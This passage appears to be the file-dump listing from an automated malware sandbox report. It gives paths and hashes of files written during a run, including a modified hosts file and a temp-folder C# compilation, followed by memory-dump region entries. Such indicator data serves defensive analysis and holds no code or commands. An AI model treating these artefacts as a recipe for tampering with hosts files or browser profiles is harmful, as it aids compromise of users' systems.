b8a8b38af748dbd412c5aefbb115ab30354e6d66034e08c0a66ca9d1403d96ac

SHA512
3e2714ea88dc3d17c001dbfd2fb1de2e2cc104b87e937d7fb3c98229304cd82e80eabe23319aa99ca2313f8cbfba155f13c11cc960833de98922265cf13e45ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
186B

MD5
094ab275342c45551894b7940ae9ad0d

SHA1
2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

SHA256
ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

SHA512
19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b3fd78a8c54de0b8e00d8b3f3879b448

SHA1
8b9701219520dbad7ecd735e57260248b75e8ab2

SHA256
dd09a1c60609505e24fe113a544fa6ead3dfa4e6eeaa1b887585be39cc1775ba

SHA512
87a9d384cec9631cb9e94647dd7f961a11541938d1f1ba09748ea3ba4a63f1ef656e3dd81156805df6d59c9afddcfbe9912b7643bc433a41c7e0ac28647a7070

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
650f2a139e05aba97b69a7e8a4db9be1

SHA1
1e3afdbe0724402777e8d2311062dee5c4450390

SHA256
407e282bf573696dae39e0dc2c0e2635b5f74142d135f4c7d4daf442a79f3223

SHA512
e01ef90a6192af7366faad1614030c28f149fbce4ba5de8fe35a0a58490aa0f30343035fb34e72695bcd14bb089459f9ef396c278f0a6973c7a8c3396e3303cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
5564b03aebf8243180e49205f5049064

SHA1
4a009900169cd1c945728ce576e2b4e6c6f35cdc

SHA256
f47b4f39ab15e6aac12d16751c395d37f9bbfc047df0844d59cd3bcc8e08e897

SHA512
65f08f51aa21cece85bbb23176277a5d7e0a5d8d1a8a7b71f785471441eae3b26b76662b7cd67e88fdd9753874d2135818e6ff7f82f7e077910cc0cad042aaa0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
beb8058cbf3e8d87091a11c72b2de315

SHA1
76facda997f3e7c3d2139e0f7dd6bbe069689f3f

SHA256
3ed5af42ee2b7a847a420cc54e3db1778a227dab4fdd44f813160f02ef94576e

SHA512
3f7fd991629bbc41ffa304d16cad3bf101b03a64ebcc694615ab57959bb917c47da87126d5aa5030e119039581088cd0dbe3bdbc9ae043927eff4a6c41c7fc3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
721991167161c45d61b03e4dbad4984b

SHA1
fd3fa85d142b5e8d4906d3e5bfe10c5347958457

SHA256
0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb

SHA512
f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Temp\J6gKV1qger\Display (1).png

Filesize
45KB

MD5
ad45d09cb470ed8273b14a1942b20acb

SHA1
c6e7d8dbc2fde5f14cde700253e67b7ae47cdb36

SHA256
f690e9ca00d9b662675a940006ea34d0c71ee2124e82b1043e8f5261c8c7483b

SHA512
b9248a4f8bcb7efcdb080c66c5b096e5e11a78bfa900b345abded3de6cae23e1f91e79d6af4f04503023015aeab3986d568e3184812757d016215a2a23e734cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEB3B.tmp

Filesize
1KB

MD5
f32a494d30b61f84f1f6a5ffeda3dbec

SHA1
d6928fc535f5bba284fa06d2ef688f0dbac01718

SHA256
542aac58b8be75f6bb2fdcd28e998835be8210fe28961be2fbcdc9652b78d49f

SHA512
bae5bd82b928c284791073091928a84e75ff6423f6c264b50e3c0a09401974031adcb7a57f5dcc00347f203633c96e853d1466384581569952082f0e1a1c0baa

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_faogc2ke.ah1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pxgewsgz\pxgewsgz.dll

Filesize
4KB

MD5
cd760a14f3292b2046974eeaa2893956

SHA1
344ebcd1225e8c8fbf064afd60aa8dc3f10c338a

SHA256
a69b44edcfa2073e28f467f7cc5cfcaa24a0ce3304c6b05881038ddece5a54c8

SHA512
01fce72e03409a30a4771294150c64b49ca47e1880a9a32d93f0dbd94d32a2a722120d6e0a274178a31b762f17f0033218849e16490ac6fbcdc319fba7e5d9d6

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 315498.crdownload

Filesize
7.2MB

MD5
8b62085a577ab07c1f013683290f9f34

SHA1
3d5f80570e5995cfe78b70a943106502a7c67990

SHA256
14c19b48de5d1725e1d94825d8e7cb09f8d3b1368445b6f310366e7dfa034b6c

SHA512
d4d577c737223ee9f9831934860e1baf947d5793335aed682e81691ee0e46abc22c0b1771e7feb8ed9ec5019ecd8997568514b7206c7bca465e569ce145803b9

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pxgewsgz\CSCE4F4550F7B2E4986B1CC2CB1269A76D.TMP

Filesize
652B

MD5
1f1952a6905440dc815490189c7350fb

SHA1
d0ebad134736a2f831176ad74ec190287724a232

SHA256
4cc2f25ec9f6c4adc0484a212961e6e32a77eec3f39f7b3c03e0b38c124ec002

SHA512
4c584e25f701ae84b6411eae7c47b00b48339e1e461d400fd4f7eb5510017d9d18b4e3968e1e357afaaaf2f546a288d298148b0ff1dfc50cf7e56ae07b54a02c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pxgewsgz\pxgewsgz.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pxgewsgz\pxgewsgz.cmdline

Filesize
607B

MD5
4775750d60d4e245f1c50ac4c2663003

SHA1
999e3f46e4247b48269287e16fc22330c498dc6a

SHA256
f4ab9d63a51a979b22ae5b9dbcd4b44892a98e6b7f6d7fda86345e150c061d31

SHA512
11afb9c1e03921911e2b76ef47dc89ae13b62a74616e28ee5e389e1177f84170b678779436270b68d6fa31dda791561a13b04de03e75bc9d3c0870379ef3fdd5

Download Submit
\??\pipe\LOCAL\crashpad_4896_FZSPYQLTZRKFFRXY

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/640-237-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-248-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-148-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-291-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-290-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-166-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-171-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-181-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-188-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-289-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-212-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-213-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-214-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-215-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-216-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-219-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-222-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-223-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-233-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-234-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-235-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-236-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-80-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-238-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-239-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-240-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-241-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-242-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-243-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-244-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-245-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-246-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-247-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-149-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-249-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-250-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-251-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-252-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-253-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-254-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-255-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-256-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-257-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-258-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-259-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-260-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-261-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-262-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-272-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-273-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-274-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-275-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-276-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-277-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-278-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-279-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-280-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-281-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-282-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-283-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-284-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-285-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-286-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-287-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/640-288-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download
memory/5124-91-0x000001577C840000-0x000001577C862000-memory.dmp

Filesize
136KB

Download
memory/5652-143-0x000001BF325D0000-0x000001BF325D8000-memory.dmp

Filesize
32KB

Download
memory/6100-165-0x0000000000600000-0x00000000014DD000-memory.dmp

Filesize
14.9MB

Download